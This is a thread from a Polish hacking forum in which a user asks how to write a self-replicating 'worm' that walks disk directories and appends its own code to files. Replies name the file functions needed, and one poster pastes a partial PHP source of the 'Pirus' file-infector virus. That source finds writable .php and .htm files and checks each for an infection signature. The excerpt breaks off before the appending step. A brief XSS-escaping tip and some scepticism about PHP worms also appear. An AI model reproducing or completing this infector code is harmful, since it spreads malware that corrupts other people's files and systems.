Shapeshifter
php worm
szukalem ale nie moglem znalezc nic ciekawego:
czego uzyc, zeby worm 'chodzil' po roznych katalogach na dysku i dopisywal swoj calutki kod, do losowo znalezionych plikow?(chodzi o dopisywanie do konca pliku, czyli 'a' w funkcji fopen)
// a no i nie chodzi o webmastering, tylko skompilowany program
War, war never changes.
killboy powerhead
opendir(), readdir(), fopen(a), fwrite(), fclose(), jakas petelka albo dwie i skrypt gotowy.
Banned
A w sumie to fajna sprawa . I na Windowsa i na Linuksa . Heh ja mam kod
Pirusa : dam kawałek
Kod php:ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[PIRUS.PHP]ÄÄÄ
<?php
$handle=opendir('.');
while ($file = readdir($handle))
{ $infected=true;
$executable=false;
if ( ($executable = strstr ($file, '.php')) || ($executable = strstr ($file, '.htm')) || ($executable = strstr ($file, '.php')) )
if ( is_file($file) && is_writeable($file) )
{
$host = fopen($file, "r");
$contents = fread ($host, filesize ($file));
$sig = strstr ($contents, 'pirus.php');
if(!$sig) $infected=false;
}
PS. Chyba wszyscy znają moje dziwne hobby
Pozdrawiam VLN.
Zamiast tego :Kod php:$zmienna = $_POST['COS'];
I mamy zabezpieczenie przed XSSKod php:$zmienna = htmlspecialchars($_POST['COS']);
Shapeshifter
jak narazie, pomoc forumowa jest znacznie lepsza niz myslalem
War, war never changes.
Banned
strstr nie koniecznie sprawdza ciag 'od konca'.
worm w php... nieno, coraz lepiej.
nie no php sie wogole nie nadaje do takich rzeczy po dziala po stronie serwera...co z tego ze napiszesz super wyrypistego worma i co z tego.......napiszesz gosciowi zeby sciagnął webserva zainstalował go i uruchomił skrypta.....bez sensu troche ;/
Zasady Postowania
Copyright © 2006-2025 - HACK.pl. Wszelkie prawa zastrzeżone.
Odpowiedź z Cytatem
